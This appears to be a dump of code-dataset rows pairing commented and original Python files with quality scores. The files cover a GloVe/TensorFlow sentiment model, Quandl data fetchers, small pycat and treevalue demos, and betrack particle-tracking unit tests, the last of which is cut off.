tokenizer = Tokenizer(num_words=max_words)
tokenizer.fit_on_texts(texts)
sequences = tokenizer.texts_to_sequences(texts)
word_index = tokenizer.word_index
data = pad_sequences(sequences, maxlen=maxlen)
labels = np.asarray(labels)
# Shuffle once (seeded) so the train/validation split is random but reproducible.
np.random.seed(7)
indices = np.arange(data.shape[0])
np.random.shuffle(indices)
data = data[indices]
labels = labels[indices]
x_train = data[:training_samples]
y_train = labels[:training_samples]
x_val = data[training_samples: training_samples + validation_samples]
y_val = labels[training_samples: training_samples + validation_samples]
## Pretrained 100-d GloVe vectors ##
glove_dir = 'd:/data/datasets/'
embeddings_index = {}
f = open(os.path.join(glove_dir, 'glove.6B.100d.txt'), encoding='utf8')
for line in f:
    values = line.split()
    word = values[0]
    coefs = np.asarray(values[1:], dtype='float32')
    embeddings_index[word] = coefs
f.close()
# Build the embedding matrix: row i holds the GloVe vector of word index i. #
embedding_dim = 100
embedding_matrix = np.zeros((max_words, embedding_dim))
for word, i in word_index.items():
    if i < max_words:
        embedding_vector = embeddings_index.get(word)
        if embedding_vector is not None:
            embedding_matrix[i] = embedding_vector
model = Sequential()
model.add(Embedding(max_words, embedding_dim, input_length=maxlen))
model.add(Flatten())
model.add(Dense(32, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.summary()
# Install the pretrained weights and freeze the embedding layer. #
model.layers[0].set_weights([embedding_matrix])
model.layers[0].trainable = False
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['acc'])
history = model.fit(x_train, y_train, epochs=10, batch_size=32, validation_data=(x_val, y_val))
## Model 3: hand-rolled network in raw TensorFlow (TF1 graph mode) ##
y_train = y_train.reshape(-1, 1)
y_val = y_val.reshape(-1, 1)
X = tf.placeholder(dtype=tf.float32, shape=[None, 100])
y = tf.placeholder(dtype=tf.float32, shape=[None, 1])
W1 = tf.Variable(tf.random_uniform(shape=[100, 10000], dtype=tf.float32, seed=7))
b1 = tf.Variable(tf.random_uniform(shape=[10000], dtype=tf.float32, seed=7))
flatten = tf.layers.flatten(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_uniform(shape=[10000, 1], dtype=tf.float32, seed=7))
b2 = tf.Variable(tf.random_uniform(shape=[1], dtype=tf.float32, seed=7))
# NOTE(review): `logits` already goes through sigmoid here, yet it is fed to
# sigmoid_cross_entropy_with_logits below, which applies sigmoid again --
# presumably an unintended double sigmoid; confirm.
logits = tf.sigmoid(tf.matmul(flatten, W2) + b2)
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits, labels=y))
train = tf.train.AdamOptimizer(0.1).minimize(cost)
correct = tf.cast(logits > 0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(y, correct), dtype=tf.float32))
with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    dataset = tf.data.Dataset.from_tensor_slices((X, y))
    dataset = dataset.repeat().batch(32)
    iterator = dataset.make_initializable_iterator()
    next_element = iterator.get_next()
    sess.run(iterator.initializer, feed_dict={X:x_train, y:y_train})
    # Training loop #
    for epoch in range(50):
        total_batch = int(x_train.shape[0] / 32)
        train_cost = 0
        for i in range(total_batch):  # one pass over all batches per epoch
            x_batch, y_batch = sess.run(next_element)
            cost_val, _ = sess.run([cost, train], feed_dict={X: x_batch, y: y_batch})
            train_cost += cost_val / total_batch
        print("cost: ", train_cost)
    acc, cor, y_hat = sess.run([accuracy, correct, logits],
                               feed_dict={X: x_val, y: y_val})
    print(acc)
| ko | 0.674029 | ### w2v ### # token # array화 # 빈번단어 1000개 # 사용 텍스트 길이? # data download # # 영화 리뷰 데이터 --> word index array # 20차원으로 축소 # # shape=(25000,20) # (25000, 20) ## embedding layer ## ### pretrained embedding model ### # 25000 label(pos / neg) # 25000 (sentences) ## label 마다 load ## # 단어개수최대 # dataset에서 사용할 단어개수 ## pretrained: Glove ## # embedding matrix # # weight set # ## tensorflow embedding ## # train # # epoch에 의해 돌아가는 1번 batch 회전 | 2.845174 | 3 |
quant_risk/utils/fetch_data.py | QAM-ATC/Risk | 1 | 6612395 | import pandas as pd
import quandl
import datetime as dt
from typing import Union
__all__ = [
'test_set',
'risk_free_rate'
]
# Gets test datasets from the quandl api
def test_set(startDate: str = None, endDate: str = None, ticker: Union[str, list] = "AAPL", **kwargs) -> pd.DataFrame:
    """Test sets which are called from Quandl each time.

    The function calls the given ticker close prices from the WIKI/PRICES
    database from Quandl. If no startDate or endDate is provided, the
    function returns the trailing twelve months (TTM) close prices for
    the ticker.

    Parameters
    ----------
    startDate : str, optional
        Start of the period to fetch, formatted "YYYY-MM-DD", by default None
    endDate : str, optional
        End of the period to fetch, formatted "YYYY-MM-DD", by default None
    ticker : str or list, optional
        Ticker(s) to fetch. If a ticker is not available in the
        WIKI/PRICES database the function raises ImportError,
        by default "AAPL"

    Returns
    -------
    pd.DataFrame
        Close prices indexed by date, one column per ticker.

    Raises
    ------
    ImportError
        If the Quandl request fails for any reason (original error chained).
    """
    # Normalise a single ticker string to a one-element list.
    if isinstance(ticker, str):
        ticker = [ticker]
    # Both dates must be provided as strings; otherwise fall back to the
    # trailing twelve months ending today.
    if not isinstance(startDate, str) or not isinstance(endDate, str):
        endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
        startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
    try:
        # The standard database that we want to use for our test cases.
        # Please note: the database does not have data beyond 2018-03-27,
        # it will be swapped out in future versions.
        database = "WIKI/PRICES"
        # Request only ticker/date/close columns within [startDate, endDate].
        data = quandl.get_table(database, qopts = { 'columns': ['ticker', 'date', 'close'] },
                                ticker = ticker, date = { 'gte': startDate, 'lte': endDate })
        data = data.pivot(index='date', columns='ticker', values='close')
    # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are not
    # swallowed, and the Quandl error is chained for debuggability.
    except Exception as err:
        raise ImportError("Unable to Import test data, please try again.") from err
    else:
        print(f"...Data for {ticker} from {startDate} to {endDate} loaded successfully")
    return data
def risk_free_rate(startDate: str = None, endDate: str = None, **kwargs) -> pd.DataFrame:
"""The function returns the riskFreeRate for a given start and end date from Quandl.
For now, the riskFreeRate is defined as the 3 Month US Treasury Bill Rate which is accessible
through the database: "USTREASURY/YIELD.1"
Parameters
----------
startDate : str, optional
Incase the user wants to supply a startDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
endDate : str, optional
Incase the user wants to supply a endDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
Returns
-------
pd.DataFrame
Returns a pandas dataframe object consisting of the called data for the riskFreeRate
"""
# Both start and end dates must be provided else the call reverts to the default set of
# endDate as today and startDate as a year back
if not isinstance(startDate, str) or not isinstance(endDate, str):
endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
try:
# The standard database that we want to use for our test cases
database = "USTREASURY/YIELD.3"
data = quandl.get(database, start_date = startDate, end_date = endDate)
data.columns = ['riskFreeRate']
except: raise ImportError("Unable to Import test data, please try again.")
else:
print(f"...Data for {database} from {startDate} to {endDate} loaded successfully")
return data | import pandas as pd
import quandl
import datetime as dt
from typing import Union
__all__ = [
'test_set',
'risk_free_rate'
]
# Gets test datasets from the quandl api
def test_set(startDate: str = None, endDate: str = None, ticker: Union[str, list] = "AAPL", **kwargs) -> pd.DataFrame:
"""Test sets which are called from Quandl each time.
The function currently calls the given ticker close prices from the WIKI/PRICES database from Quandl.
If no startDate or endDate is provided, the function returns the trailing twelve months (TTM) close prices for the ticker
Parameters
----------
startDate : str, optional
Incase the user wants to supply a startDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
endDate : str, optional
Incase the user wants to supply a endDate to call data from a specific time period
The format is "YYYY-MM-DD", by default None
ticker : str, optional
The test set ticker dataset that is called.
Incase, the called ticker is not available in the WIKI/PRICES database,
the function throws an error, by default "AAPL"
Returns
-------
pd.DataFrame
Returns a pandas dataframe object consisting of the called data for the ticker
"""
# Incase the ticker provided is a single string rather than a list of tickers
if isinstance(ticker, str):
ticker = [ticker]
# Both start and end dates must be provided else the call reverts to the default set of
# endDate as today and startDate as a year back
if not isinstance(startDate, str) or not isinstance(endDate, str):
endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
try:
# The standard database that we want to use for our test cases
# Please note: the database does not have data beyond 2018-03-27, it will be swapped out in future versions
database = "WIKI/PRICES"
# Filtering the database by columns to only return the ticker, date, and close price for the dates greater than
# or equal to the startDate and less than and equal to the endDate
data = quandl.get_table(database, qopts = { 'columns': ['ticker', 'date', 'close'] },
ticker = ticker, date = { 'gte': startDate, 'lte': endDate })
data = data.pivot(index='date', columns='ticker', values='close')
except: raise ImportError("Unable to Import test data, please try again.")
else:
print(f"...Data for {ticker} from {startDate} to {endDate} loaded successfully")
return data
def risk_free_rate(startDate: str = None, endDate: str = None, **kwargs) -> pd.DataFrame:
    """Return the riskFreeRate for a given start and end date from Quandl.

    For now, the riskFreeRate is taken from the US Treasury yield curve
    database, column 3 ("USTREASURY/YIELD.3" -- presumably the 3 Month
    US Treasury Bill rate; confirm against the Quandl dataset docs).

    Parameters
    ----------
    startDate : str, optional
        Start of the period to fetch, formatted "YYYY-MM-DD", by default None
    endDate : str, optional
        End of the period to fetch, formatted "YYYY-MM-DD", by default None

    Returns
    -------
    pd.DataFrame
        A single-column ('riskFreeRate') dataframe indexed by date.

    Raises
    ------
    ImportError
        If the Quandl request fails for any reason (original error chained).
    """
    # Both dates must be provided as strings; otherwise fall back to the
    # trailing twelve months ending today.
    if not isinstance(startDate, str) or not isinstance(endDate, str):
        endDate = dt.datetime.today().strftime(format="%Y-%m-%d")
        startDate = (dt.datetime.today() - dt.timedelta(days=365)).strftime(format="%Y-%m-%d")
    try:
        # The standard database that we want to use for our test cases.
        database = "USTREASURY/YIELD.3"
        data = quandl.get(database, start_date = startDate, end_date = endDate)
        data.columns = ['riskFreeRate']
    # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are not
    # swallowed, and the Quandl error is chained for debuggability.
    except Exception as err:
        raise ImportError("Unable to Import test data, please try again.") from err
    else:
        print(f"...Data for {database} from {startDate} to {endDate} loaded successfully")
    return data
For now, the riskFreeRate is defined as the 3 Month US Treasury Bill Rate which is accessible through the database: "USTREASURY/YIELD.1" Parameters ---------- startDate : str, optional Incase the user wants to supply a startDate to call data from a specific time period The format is "YYYY-MM-DD", by default None endDate : str, optional Incase the user wants to supply a endDate to call data from a specific time period The format is "YYYY-MM-DD", by default None Returns ------- pd.DataFrame Returns a pandas dataframe object consisting of the called data for the riskFreeRate # Both start and end dates must be provided else the call reverts to the default set of # endDate as today and startDate as a year back # The standard database that we want to use for our test cases | 3.404518 | 3 |
pycat/test/intersection_test.py | cmorace/pycat | 0 | 6612396 | <reponame>cmorace/pycat
from pycat.base.event.mouse_event import MouseEvent
from pycat.core import Window, Point, Color
from pycat.shape import Circle, Line
from pycat.geometry.intersection import line_intersection
w = Window()
def on_mouse_motion(m: MouseEvent):
    """Redraw two line segments and mark their intersection, if one exists."""
    w.clear_drawables()
    # First segment: from the window's top-left corner to the mouse position.
    seg1_start = Point(0, w.height)
    seg1_end = m.position
    # Second segment: a fixed diagonal across the window.
    seg2_start = Point(100, 100)
    seg2_end = Point(w.width-100, w.height-100)
    w.add_drawable(Line(seg1_start, seg1_end))
    w.add_drawable(Line(seg2_start, seg2_end))
    hit = line_intersection(seg1_start.x, seg1_start.y, seg1_end.x, seg1_end.y,
                            seg2_start.x, seg2_start.y, seg2_end.x, seg2_end.y)
    if hit:
        # Highlight the intersection point with a red circle.
        w.add_drawable(Circle(hit, 10, color=Color.RED))
w.run(on_mouse_motion=on_mouse_motion)
| from pycat.base.event.mouse_event import MouseEvent
from pycat.core import Window, Point, Color
from pycat.shape import Circle, Line
from pycat.geometry.intersection import line_intersection
w = Window()
def on_mouse_motion(m: MouseEvent):
w.clear_drawables()
a = Point(0, w.height)
b = m.position
c = Point(100, 100)
d = Point(w.width-100, w.height-100)
w.add_drawable(Line(a, b))
w.add_drawable(Line(c, d))
x = line_intersection(a.x, a.y, b.x, b.y, c.x, c.y, d.x, d.y)
if x:
w.add_drawable(Circle(x, 10, color=Color.RED))
w.run(on_mouse_motion=on_mouse_motion) | none | 1 | 3.277069 | 3 | |
docs/source/tutorials/advanced_usage/flatten_demo.demo.py | HansBug/treevalue | 0 | 6612397 | <gh_stars>0
from treevalue import TreeValue, raw, flatten
if __name__ == '__main__':
    # Build a tree with plain leaves ('a', 'b'), a dict kept as a single
    # opaque leaf via raw() ('c'), and a nested subtree ('d').
    t = TreeValue({
        'a': 1,
        'b': 2,
        'c': raw({'x': 3, 'y': 4}),
        'd': {
            'x': 3,
            'y': 4
        },
    })
    # Demonstrate flatten() on the tree -- presumably it enumerates the
    # tree's leaves (note 'c' stays one value while 'd' is descended into).
    print('flatten(t):')
    print(flatten(t))
| from treevalue import TreeValue, raw, flatten
if __name__ == '__main__':
t = TreeValue({
'a': 1,
'b': 2,
'c': raw({'x': 3, 'y': 4}),
'd': {
'x': 3,
'y': 4
},
})
print('flatten(t):')
print(flatten(t)) | none | 1 | 3.142183 | 3 | |
tests/commands/test_trackparticles.py | gvalentini85/betrack-cli | 0 | 6612398 | #------------------------------------------------------------------------------#
# Copyright 2018 <NAME>. All rights reserved. Use of this source #
# code is governed by a MIT license that can be found in the LICENSE file. #
#------------------------------------------------------------------------------#
"""
Tests for module `betrack.commands.trackparticles`.
"""
try:
from os import EX_OK, EX_CONFIG
except ImportError:
EX_OK = 0
EX_CONFIG = 78
from unittest import TestCase, skip
from tempfile import NamedTemporaryFile
from os import remove, name
from os.path import isfile, dirname, realpath
from cv2 import VideoWriter, VideoWriter_fourcc
from numpy import arange, array, zeros, uint8
from betrack.commands.trackparticles import *
class TestTrackParticles(TestCase):
    """Integration tests for the `betrack trackparticles` command.

    A small synthetic video with `_nparticles` bright green features moving
    horizontally by `_hoffset` pixels per frame is rendered once for the
    whole class and used as input by every test.
    """

    @classmethod
    def setUpClass(cls):
        """Render the temporary synthetic test video used by all tests."""
        # Create temporary video file..
        cls._vf = NamedTemporaryFile(mode='w', suffix='.avi', delete=False)
        cls._vf.close()
        cls._nframes = 10
        cls._pdiameter = 11       # Feature diameter in pixels; must be odd!
        cls._nparticles = 5
        cls._voffset = 100        # Vertical spacing between particles.
        cls._hoffset = 10         # Horizontal displacement per frame.
        codec = VideoWriter_fourcc('M', 'J', 'P', 'G')
        cls._framerate = cls._nframes
        cls._frameshape = (1000, 1000, 3)
        # OpenCV's VideoWriter expects (width, height).
        oshape = cls._frameshape[0:2][::-1]
        writer = VideoWriter(cls._vf.name, codec, cls._framerate, oshape)
        for i in arange(0, cls._nframes):
            f = zeros(cls._frameshape, dtype=uint8)
            for p in arange(0, cls._nparticles):
                pr = int(cls._pdiameter/2)
                y = cls._voffset * (p + 1)
                y = arange(y - pr, y + pr + 1)
                x = cls._voffset + cls._hoffset * (i + 1)
                x = arange(x - pr, x + pr + 1)
                # Paint a small bright feature in the green channel.
                f[y, x, 1] = 255
            f = array(f)
            writer.write(f)
        writer.release()

    @classmethod
    def tearDownClass(cls):
        """Remove the temporary video (skipped on Windows, where the file
        may still be locked by the OS)."""
        if name != 'nt': remove(cls._vf.name)

    # ------------------------------------------------------------------ #
    # Helpers                                                            #
    # ------------------------------------------------------------------ #

    def _write_config(self, content):
        """Write *content* to a temporary .yml file and return its path.

        The caller is responsible for removing the file."""
        cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
        cf.write(content)
        cf.close()
        return cf.name

    def _new_tracker(self, path):
        """Return a TrackParticles instance configured from the file at *path*."""
        opt = {'--configuration': path}
        tp = TrackParticles(opt)
        tp.configure_tracker(opt['--configuration'])
        return tp

    def _assert_bad_config(self, content):
        """Assert that configuring from *content* exits with EX_CONFIG."""
        path = self._write_config(content)
        opt = {'--configuration': path}
        tp = TrackParticles(opt)
        with self.assertRaises(SystemExit) as cm:
            tp.configure_tracker(opt['--configuration'])
        self.assertEqual(cm.exception.code, EX_CONFIG)
        remove(path)

    def _std_config(self, extra=''):
        """Return a minimal valid configuration string for the test video,
        optionally extended with *extra* option lines."""
        return ('tp-locate-diameter: ' + str(self._pdiameter) + '\n'
                + 'tp-link-searchrange: ' + str(self._hoffset * 2) + '\n'
                + extra
                + 'jobs:\n'
                + ' - video: ' + self._vf.name + '\n')

    # ------------------------------------------------------------------ #
    # Tests                                                              #
    # ------------------------------------------------------------------ #

    def test_configure_tracker(self):
        # A missing configuration file must be rejected. NamedTemporaryFile
        # with the default delete=True removes the file on close, so the
        # path no longer exists when configure_tracker() reads it.
        cf = NamedTemporaryFile(mode='w', suffix='.yml')
        cf.close()
        opt = {'--configuration': cf.name}
        tp = TrackParticles(opt)
        with self.assertRaises(SystemExit) as cm:
            tp.configure_tracker(opt['--configuration'])
        self.assertEqual(cm.exception.code, EX_CONFIG)
        # Every invalid configuration below must exit with EX_CONFIG.
        bad_configs = [
            # Unsupported export format.
            'tp-exportas: excel',
            # Even feature diameter (an odd value is required).
            'tp-locate-diameter: 12',
            # Empty jobs list.
            'jobs:',
            # Invalid values for individual locate options.
            'tp-locate-diameter: 11\ntp-locate-featuresdark: 11\n',
            'tp-locate-diameter: 11\ntp-locate-minmass: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-maxsize: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-separation: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-noisesize: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-smoothingsize: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-threshold: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-percentile: -1.5\n',
            'tp-locate-diameter: 11\ntp-locate-topn: -1\n',
            'tp-locate-diameter: 11\ntp-locate-preprocess: -1\n',
            # Missing mandatory search range.
            'tp-locate-diameter: 11\n',
            # Invalid values for individual link/filter options.
            'tp-locate-diameter: 11\ntp-link-searchrange: -1\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-link-memory: -1\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-link-predict: yep\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-link-adaptivestop: -1.0\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-link-adaptivestep: -1.0\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-filter-st-threshold: -1\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-filter-cl-quantile: -1.0\n',
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\ntp-filter-cl-threshold: 0\n',
            # Job referencing a video file that does not exist.
            'tp-locate-diameter: 11\ntp-link-searchrange: 10\njobs:\n - video: dummy.avi\n',
        ]
        for content in bad_configs:
            self._assert_bad_config(content)

    def test_locate_features(self):
        # BUGFIX: the search range was previously built with string
        # repetition (str(self._hoffset) * 2 == '1010'); twice the per-frame
        # displacement -- as used by every other test -- was intended.
        path = self._write_config(self._std_config())
        tp = self._new_tracker(path)
        # The output directory defaults to the video's directory.
        self.assertEqual(tp.jobs[0].outdir, dirname(realpath(self._vf.name)))
        tp.jobs[0].load_frames()
        tp.jobs[0].preprocess_video()
        tp.locate_features(tp.jobs[0])
        self.assertTrue(isfile(tp.jobs[0].h5storage))
        self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
                         dirname(realpath(self._vf.name)))
        # Exactly one feature per particle per frame must have been located.
        with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
            res = sf.dump()
        self.assertEqual(res.shape, (self._nframes * self._nparticles, 9))
        tp.jobs[0].release_memory()
        remove(path)

    def test_link_trajectories(self):
        path = self._write_config(self._std_config())
        tp = self._new_tracker(path)
        tp.jobs[0].load_frames()
        tp.jobs[0].preprocess_video()
        tp.locate_features(tp.jobs[0])
        tp.link_trajectories(tp.jobs[0])
        self.assertTrue(isfile(tp.jobs[0].h5storage))
        self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
                         dirname(realpath(self._vf.name)))
        # Linking adds a particle-id column (9 -> 10 columns).
        with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
            res = sf.dump()
        self.assertEqual(res.shape, (self._nframes * self._nparticles, 10))
        self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
        tp.jobs[0].release_memory()
        remove(path)

    def test_filter_trajectories(self):
        path = self._write_config(self._std_config(
            'tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n'
            + 'tp-filter-cl-threshold: 200\n'))
        tp = self._new_tracker(path)
        tp.jobs[0].load_frames()
        tp.jobs[0].preprocess_video()
        tp.locate_features(tp.jobs[0])
        tp.link_trajectories(tp.jobs[0])
        tp.filter_trajectories(tp.jobs[0])
        # Every synthetic trajectory spans the whole video, so filtering
        # must not drop any row.
        self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
        tp.jobs[0].release_memory()
        remove(path)

    def test_export_video(self):
        path = self._write_config(self._std_config())
        tp = self._new_tracker(path)
        tp.jobs[0].load_frames()
        tp.jobs[0].preprocess_video()
        tp.locate_features(tp.jobs[0])
        tp.link_trajectories(tp.jobs[0])
        tp.export_video(tp.jobs[0])
        # The annotated video must land next to the input video.
        self.assertTrue(isfile(tp.jobs[0].avitracked))
        self.assertEqual(dirname(realpath(tp.jobs[0].avitracked)),
                         dirname(realpath(self._vf.name)))
        tp.jobs[0].release_memory()
        remove(tp.jobs[0].avitracked)
        remove(path)

    def test_run(self):
        # A job list with valid jobs completes with EX_OK, even though the
        # last job carries oversized crop margins.
        # NOTE(review): presumably job failures are handled per-job so the
        # run as a whole still succeeds -- confirm against TrackParticles.run.
        path = self._write_config(
            'tp-locate-diameter: ' + str(self._pdiameter) + '\n'
            + 'tp-link-searchrange: ' + str(self._hoffset * 2) + '\n'
            + 'tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n'
            + 'jobs:\n'
            + ' - video: ' + self._vf.name + '\n'
            + ' - video: ' + self._vf.name + '\n'
            + '   period-frame: [0, 100]\n'
            + ' - video: ' + self._vf.name + '\n'
            + '   crop-margins: [0, 2000, 0, 2000]\n')
        tp = self._new_tracker(path)
        rval = tp.run()
        self.assertEqual(rval, EX_OK)
        remove(path)
        remove(tp.jobs[0].avitracked)
        # When the only job is invalid the run must fail with EX_CONFIG.
        path = self._write_config(
            'tp-locate-diameter: ' + str(self._pdiameter) + '\n'
            + 'tp-link-searchrange: ' + str(self._hoffset * 2) + '\n'
            + 'tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n'
            + 'jobs:\n'
            + ' - video: ' + self._vf.name + '\n'
            + '   crop-margins: [0, 2000, 0, 2000]\n')
        tp = self._new_tracker(path)
        rval = tp.run()
        self.assertEqual(rval, EX_CONFIG)
        remove(path)
#------------------------------------------------------------------------------#
# Copyright 2018 <NAME>. All rights reserved. Use of this source #
# code is governed by a MIT license that can be found in the LICENSE file. #
#------------------------------------------------------------------------------#
"""
Tests for module `betrack.commands.trackparticles`.
"""
try:
from os import EX_OK, EX_CONFIG
except ImportError:
EX_OK = 0
EX_CONFIG = 78
from unittest import TestCase, skip
from tempfile import NamedTemporaryFile
from os import remove, name
from os.path import isfile, dirname, realpath
from cv2 import VideoWriter, VideoWriter_fourcc
from numpy import arange, array, zeros, uint8
from betrack.commands.trackparticles import *
class TestTrackParticles(TestCase):
    """Tests for the TrackParticles command.

    A synthetic AVI video is generated once for the whole class: bright
    green features on a black background, shifted horizontally by
    `_hoffset` pixels per frame, so trackpy can locate and link them
    deterministically.
    """
    @classmethod
    def setUpClass(cls):
        """Write the synthetic test video to a temporary .avi file."""
        # Create temporary video file..
        cls._vf = NamedTemporaryFile(mode='w', suffix='.avi', delete=False)
        cls._vf.close()
        cls._nframes = 10           # frames in the video
        cls._pdiameter = 11 # Must be odd!
        cls._nparticles = 5         # features drawn per frame
        cls._voffset = 100          # vertical spacing between features (px)
        cls._hoffset = 10           # horizontal displacement per frame (px)
        codec = VideoWriter_fourcc('M', 'J', 'P', 'G')
        cls._framerate = cls._nframes
        cls._frameshape = (1000, 1000, 3)
        # OpenCV's VideoWriter expects the frame size as (width, height).
        oshape = cls._frameshape[0:2][::-1]
        writer = VideoWriter(cls._vf.name, codec, cls._framerate, oshape)
        for i in arange(0, cls._nframes):
            f = zeros(cls._frameshape, dtype=uint8)
            for p in arange(0, cls._nparticles):
                pr = int(cls._pdiameter/2)  # feature radius in pixels
                y = cls._voffset * (p + 1)
                y = arange(y - pr, y + pr + 1)
                x = cls._voffset + cls._hoffset * (i + 1)
                x = arange(x - pr, x + pr + 1)
                # NOTE(review): with two index arrays this sets only the
                # diagonal pixels (y[k], x[k], green), not a filled
                # pdiameter x pdiameter square -- confirm this is intended
                # before changing, as the tests pass with it as-is.
                f[y, x, 1] = 255
            f = array(f)  # NOTE(review): redundant copy of f (no-op)
            writer.write(f)
        writer.release()
@classmethod
def tearDownClass(cls):
# Remove temporary file..
if name != 'nt': remove(cls._vf.name)
def test_configure_tracker(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-exportas: excel')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 12')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('jobs:')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-featuresdark: 11\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-minmass: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-maxsize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-separation: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-noisesize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-smoothingsize: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-threshold: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-percentile: -1.5\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-topn: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
